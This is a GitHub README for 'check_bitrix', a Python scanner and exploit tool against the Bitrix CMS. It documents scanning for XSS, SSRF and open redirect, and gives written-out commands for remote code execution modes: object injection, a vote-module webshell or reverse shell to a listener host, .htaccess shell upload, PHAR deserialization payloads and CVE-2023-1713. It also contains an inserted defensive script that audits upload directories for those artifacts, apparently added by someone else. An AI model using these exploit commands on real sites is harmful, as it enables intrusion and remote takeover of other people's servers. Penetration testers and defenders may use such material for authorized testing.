k1rurk/check_bitrix

Bitrix Scanner

Check your website for Bitrix vulnerabilities

Table of Contents
  1. Features
  2. Usage
  3. Legal disclaimer
  4. References

Features

This script scans common Bitrix vulnerabilities:

  • exposed login pages;
  • exposed register pages;
  • pages that contain errors;
  • admin panels;
  • content spoofing;
  • open redirect;
  • reflected xss;
  • stored xss via file upload (works only with Apache);
  • ssrf.

You can also check the following RCE vulnerabilities separately:

  • object injection (RCE "html_editor_action");
  • vote (webshell, reverse shell, phar, .htaccess);
  • insecure temporary file creation (CVE-2023-1713).

(back to top)

Usage

python3 test_bitrix.py -h

This displays the help for the tool:

usage: python3 test_bitrix.py [-h] -t TARGET [-x proxy] {scan,rce_vote,vote_phar,vote_htaccess,object_injection,tmp_file_create} ...

positional arguments:
  {scan,rce_vote,vote_phar,vote_htaccess,object_injection,tmp_file_create}
    scan                Scan mode
    rce_vote            RCE vote mode
    vote_phar           RCE vote phar deserialize mode (Exploit Nginx or Apache setup using PHAR deserialization)
    vote_htaccess       RCE vote using .htaccess mode (Exploit Apache setup using .htaccess and shell upload)
    object_injection    RCE object injection mode
    tmp_file_create     RCE via Insecure Temporary File Creation CVE-2023-1713 (It works only with Apache. The .htaccess file is required to be present in the same directory as the Python3 exploit code). Need any valid set of credentials (regardless of privileges)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target url (example: https://target.com) (default: None)
  -x proxy, --proxy proxy
                        URL proxy (example: http://127.0.0.1:8080) (default: None)

Running scan mode

Scan for common vulnerabilities:

python3 test_bitrix.py -t https://example.com scan -s http://subdomain.oastify.com

Display help for mode

python3 test_bitrix.py scan -h
usage: python3 test_bitrix.py scan [-h] -s SSRF_URL

options:
  -h, --help            show this help message and exit
  -s SSRF_URL, --ssrf_url SSRF_URL
                        url for ssrf attack (example: http://5kqki2fsl626q2257vy6xc2ef5lw9rxg.oastify.com)

Running RCE object injection

python3 test_bitrix.py -t https://example.com object_injection -c 'whoami'

Display help for mode

python3 test_bitrix.py object_injection -h
usage: python3 test_bitrix.py object_injection [-h] [-f FUNCTION] -c COMMAND

options:
  -h, --help            show this help message and exit
  -f FUNCTION, --function FUNCTION
                        Used function
  -c COMMAND, --command COMMAND
                        Command for execution

Running RCE vote

Webshell

python3 test_bitrix.py -t https://example.com rce_vote --web-shell true

Reverse shell

python3 test_bitrix.py -t https://example.com rce_vote --lhost 192.168.1.1 --lport 8001

Display help for mode

python3 test_bitrix.py rce_vote -h
usage: python3 test_bitrix.py rce_vote [-h] [--id_agent ID_AGENT] [--lhost LHOST] [--lport LPORT] [--web-shell webshell] [--path path]

options:
  -h, --help            show this help message and exit
  --id_agent ID_AGENT   ID of vote module agent (2, 4 and 7 available)
  --lhost LHOST         IP address for reverse connection
  --lport LPORT         Port of the host that listens for reverse connection
  --web-shell webshell  Use web shell instead of console reverse shell
  --path path           Path where in the site to upload a random file (example: /upload/iblock/1d3/)

Running RCE vote using .htaccess

Prepare a webshell page as the payload. The payload must not have a .php extension. The webshell may be taken from here; just save it as an HTML file.

python3 test_bitrix.py -t https://example.com vote_htaccess -p shell.html

Display help for mode

python3 test_bitrix.py vote_htaccess -h
usage: python3 test_bitrix.py vote_htaccess [-h] -p payload

options:
  -h, --help            show this help message and exit
  -p payload, --payload payload
                        Path to payload file

Running RCE vote phar deserialization

Generate the phar payload file with the PHP script:

php -d phar.readonly=0 gadgets.php rce1 system '<os command here>' payload.phar

Use it as the payload:

python3 test_bitrix.py -t https://example.com vote_phar -p payload.phar

Display help for mode

python3 test_bitrix.py vote_phar -h
usage: python3 test_bitrix.py vote_phar [-h] -p payload

options:
  -h, --help            show this help message and exit
  -p payload, --payload payload
                        Path to payload file

Running RCE via Insecure Temporary File Creation

This works only with Apache. The .htaccess file must be present in the same directory as the Python3 exploit code. Obtain user credentials (any privilege level is sufficient). Specify the login page in the -r parameter, the port on which the host listens for the web connection in --lport1, and the port on which it listens for the reverse shell connection in --lport2.

python3 test_bitrix.py -t https://example.com tmp_file_create -r bitrix/components/bitrix/map.yandex.search/settings/settings.php?login=yes -l user -p 123456 --lhost 192.168.1.11 --lport1 8001 --lport2 9001

Create a file named cached-creds.txt in the same directory as the Python script, write the PHPSESSID:sessid value into it, then run the command below:

python3 test_bitrix.py -t https://example.com tmp_file_create --lhost 192.168.1.11 --lport1 8001 --lport2 9001

Display help for mode

python3 test_bitrix.py tmp_file_create -h
usage: python3 test_bitrix.py tmp_file_create [-h] [-r PATH_LOGIN] [-l LOGIN] [-p PASSWORD] --lhost LHOST --lport1 LPORT1 --lport2 LPORT2 [-d DELAY_SECONDS] [-n N_REPS] [-i SITE_ID]

options:
  -h, --help            show this help message and exit
  -r PATH_LOGIN, --path_login PATH_LOGIN
                        Url path for login
  -l LOGIN, --login LOGIN
                        User login
  -p PASSWORD, --password PASSWORD
                        User password
  --lhost LHOST         IP address for reverse connection
  --lport1 LPORT1       Port of the host that listens for web connection
  --lport2 LPORT2       Port of the host that listens for reverse shell connection
  -d DELAY_SECONDS, --delay_seconds DELAY_SECONDS
                        Delay the deletion of uploaded files
  -n N_REPS, --n_reps N_REPS
                        Number of replicated files
  -i SITE_ID, --site_id SITE_ID
                        Site id
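As a defender-side counterpart to the vote, .htaccess and phar modes above, here is an added example (not part of the check_bitrix project) that audits a Bitrix upload/ tree for the artifacts those modes leave behind: stray .htaccess files, PHAR archives, and PHP or script code parked under a harmless extension. The content signatures, the upload/iblock/ sample paths and the function names are assumptions.

```python
# Added example (not project code): audit a Bitrix upload/ tree for the artifacts
# the vote, .htaccess and phar modes above leave behind. Signatures are assumptions.
import os, re, tempfile
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
SCRIPT_TAG = re.compile(rb"<script\b", re.IGNORECASE)
PHAR_STUB = re.compile(rb"__HALT_COMPILER\(\)", re.IGNORECASE)
EXEC_EXTS = {".php", ".phtml", ".phar"}  # extensions PHP would execute directly

def classify(path: str, head: bytes) -> list[str]:
    """Reasons a single uploaded file is suspicious (empty list if clean)."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()  # '.htaccess' yields no extension
    reasons = []
    if name == ".htaccess":  # a writable .htaccess under upload/ can remap types
        reasons.append("htaccess-in-upload")
    if ext in EXEC_EXTS:  # PHP/PHAR file sitting in a data directory
        reasons.append("executable-extension")
    if PHAR_STUB.search(head):  # PHAR archive regardless of its extension
        reasons.append("phar-archive")
    if PHP_TAG.search(head) and ext not in EXEC_EXTS:  # code parked in a .jpg/.html
        reasons.append("php-code-in-non-php-file")
    if SCRIPT_TAG.search(head) and ext in {".html", ".htm", ".svg", ".xml"}:
        reasons.append("script-in-uploaded-markup")  # stored XSS via upload
    return reasons

def audit_upload_dir(root: str, max_read: int = 65536) -> list[tuple[str, list[str]]]:
    """Walk root (e.g. <docroot>/upload) and return sorted (relpath, reasons) hits."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, "rb") as fh:
                head = fh.read(max_read)  # the signatures sit near the start
            reasons = classify(full, head)
            if reasons:
                findings.append((os.path.relpath(full, root), reasons))
    return sorted(findings)

def build_sample_tree() -> str:
    """Constructed sample upload tree (not real data) for trying the audit."""
    root = tempfile.mkdtemp(prefix="bitrix_upload_")
    samples = {"iblock/1d3/.htaccess": b"# constructed sample\n",
               "iblock/1d3/photo.html": b"<html><script>alert(1)</script></html>",
               "iblock/1d3/avatar.jpg": b"<?php echo 1; ?>",
               "iblock/a1b/archive.phar": b"<?php __HALT_COMPILER(); ?>"}
    for rel, data in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh: fh.write(data)
    return root
```

Run audit_upload_dir against the site's real upload directory; any hit is either an artifact to remove or a file that should never have been accepted by the upload handler.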

(back to top)

Legal disclaimer

Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

(back to top)

References

(back to top)
